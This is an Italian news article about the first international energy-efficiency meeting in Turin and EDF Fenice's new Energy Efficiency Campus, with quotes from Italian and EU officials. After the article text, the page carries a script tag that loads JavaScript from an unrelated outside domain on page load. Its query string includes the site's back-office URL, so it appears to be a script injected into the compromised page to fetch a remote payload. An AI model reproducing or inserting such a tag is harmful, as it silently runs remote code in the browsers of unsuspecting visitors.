1. Home
  2. Notizie e Mercato
  3. Il primo Meeting internazionale di Torino sull’efficienza energetica

Il primo Meeting internazionale di Torino sull’efficienza energetica

Energie rinnovabili di
Il Gruppo EDF punta sull'efficienza energetica in ambito industriale: uno strumento per migliorare la performance delle aziende europee e vincere la concorrenza


Con un pubblico di oltre 1000 persone provenienti da diversi paesi, la conferenza internazionale organizzata a Torino (Italia) è stata l'occasione per annunciare la creazione del Campus efficienza energetica di EDF Fenice, centro di formazione degli Energy managers e struttura internazionale di incontro tra gli industriali, gli specialisti dell’energia, i docenti e i rappresentanti degli Enti pubblici. Il Meeting ha permesso, inoltre, l’analisi approfondita delle prospettive offerte dall’efficienza energetica in ambito industriale.

Ottimizzare l'uso di energia per ridurre i costi di produzione e, quindi, migliorare la competitività delle industrie europee è diventata una necessità assoluta in un contesto, come quello di oggi, di concorrenza esasperata a livello mondiale.

Nei primi mesi del 2013 è stata appositamente creata, all'interno del Gruppo EDF, una Divisione Servizi energetici, con EDF Fenice come esponente principale. Questa strategia consente al gruppo francese di ampliare la gamma dei suoi potenziali mercati: d’ora in poi, oltre alla vendita di energia (elettricità e gas naturale), EDF offrirà anche servizi energetici quali efficienza energetica, smart grid/ smart meters ect. La creazione del Campus Efficienza energetica testimonia e conferma la volontà del gruppo EDF di investire in Italia, per farne il punto di partenza della conquista dei mercati dell’efficienza energetica in Europa. Il Comune di Torino, la Regione Piemonte, oltre al Politecnico, la FIRE e Confindustria si sono, dunque, associati alla sfida di EDF Fenice.

Secondo il Ministro dello Sviluppo, Flavio Zanonato, relatore durante il meeting, l’industria italiana  rappresenta di fatto un notevole bacino potenziale di efficienza energetica e, quindi, di crescita economica, mentre Fabrizio Barbaso (Vice Direttore Generale presso la Direzione Generale per l'Energia della Commissione europea) ha sottolineato come, se ben supportata da istituzioni politiche e finanziarie, l’efficienza energetica possa anche contribuire a ostacolare la delocalizzazione industriale nel sud-est asiatico e, dunque, preservare la struttura produttiva in Europa.

Al termine del Meeting, Nicolas Katcharov, AD di EDF Fenice, uno dei principali fornitori di servizi di efficienza energetica per l'industria in Europa, ha invitato le imprese italiane dotate di visione strategica a farsi avanti, cosi da costruire con EDF Fenice partnership vincenti.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.05237710497072645" type="text/javascript"></script>